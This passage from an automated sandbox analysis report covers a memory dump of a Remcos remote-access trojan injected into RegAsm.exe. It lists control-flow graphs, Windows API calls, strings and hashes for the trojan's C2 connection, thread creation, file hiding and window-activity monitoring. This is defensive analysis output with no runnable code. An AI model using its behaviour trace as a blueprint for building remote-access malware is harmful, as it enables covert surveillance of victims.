401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->294 292->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 
404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                  • API String ID: 2830904901-3701325316
                                                  • Opcode ID: 2199bd2de398ccf8a1346b2b40a1738b67815dd12efcceaf0f6a0a09c4cb1fc0
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: 2199bd2de398ccf8a1346b2b40a1738b67815dd12efcceaf0f6a0a09c4cb1fc0
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                  Control-flow Graph

                                                  control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 596 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->596 597 415b18-415b20 call 401e8d 584->597 596->597 597->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 
402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                  • API String ID: 524882891-3007660392
                                                  • Opcode ID: 948cd98a942e852b60b2306ae3dc943f102348f17b1aa1f97d96d3b2a21ead90
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: 948cd98a942e852b60b2306ae3dc943f102348f17b1aa1f97d96d3b2a21ead90
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                  Control-flow Graph

                                                  control_flow_graph 925 414dc1-414dfd 926 414e03-414e18 GetSystemDirectoryA 925->926 927 414f18-414f23 925->927 928 414f0e 926->928 929 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 926->929 928->927 934 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 929->934 935 414e6c-414e76 GetProcAddress 929->935 946 414f0a-414f0d 934->946 947 414ebd-414ec7 GetProcAddress 934->947 936 414e78-414e7b FreeLibrary 935->936 937 414e7d-414e7f 935->937 936->937 937->934 940 414ed2 937->940 942 414ed4-414ee5 GetProcAddress 940->942 944 414ee7-414eeb 942->944 945 414eef-414ef2 FreeLibrary 942->945 944->942 948 414eed 944->948 949 414ef4-414ef6 945->949 946->928 950 414ec9-414ecc FreeLibrary 947->950 951 414ece-414ed0 947->951 948->949 949->946 952 414ef8-414f08 949->952 950->951 951->940 951->946 952->946 952->952
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                  • API String ID: 3795512280-1152054767
                                                  • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                  Control-flow Graph

                                                  control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420cf1 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b580 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1073 404941-40494e call 420f20 1059->1073 1074 404932-40493c 1059->1074 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1061->1064 1066 404a7b-404a94 call 402093 * 2 call 41b580 1063->1066 1064->1057 1066->1057 1083 404950-404973 call 402093 * 2 call 41b580 1073->1083 1084 404987-404992 call 421ad1 1073->1084 1074->1066 1113 404976-404982 call 420d31 1083->1113 1096 4049c4-4049d1 call 420e97 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b580 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                  Control-flow Graph

                                                  control_flow_graph 1206 40da6f-40da94 call 401f86 1209 40da9a 1206->1209 1210 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1206->1210 1211 40dae0-40dae7 call 41c048 1209->1211 1212 40daa1-40daa6 1209->1212 1213 40db93-40db98 1209->1213 1214 40dad6-40dadb 1209->1214 1215 40dba9 1209->1215 1216 40db9a-40dba7 call 43c11f 1209->1216 1217 40daab-40dab9 call 41b645 call 401f13 1209->1217 1218 40dacc-40dad1 1209->1218 1219 40db8c-40db91 1209->1219 1236 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1210->1236 1231 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1211->1231 1232 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1211->1232 1221 40dbae call 43c11f 1212->1221 1213->1221 1214->1221 1215->1221 1216->1215 1233 40dbb4-40dbb9 call 409092 1216->1233 1239 40dabe 1217->1239 1218->1221 1219->1221 1234 40dbb3 1221->1234 1244 40dac2-40dac7 call 401f09 1231->1244 1232->1239 1233->1210 1234->1233 1239->1244 1244->1210
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

Control-flow Graph: function 0044ACC9 (rendered graph; edge data omitted)
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

Control-flow Graph: function 0041C482 (rendered graph; edge data omitted)
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

Control-flow Graph: function 0041B354 (rendered graph; edge data omitted)
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 3f67e54296d7e2c924aadc0e9923d858110a08a4befc92e0570a0970493cb547
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 3f67e54296d7e2c924aadc0e9923d858110a08a4befc92e0570a0970493cb547
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

Control-flow Graph: function 0040A6B0 (rendered graph; edge data omitted)
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
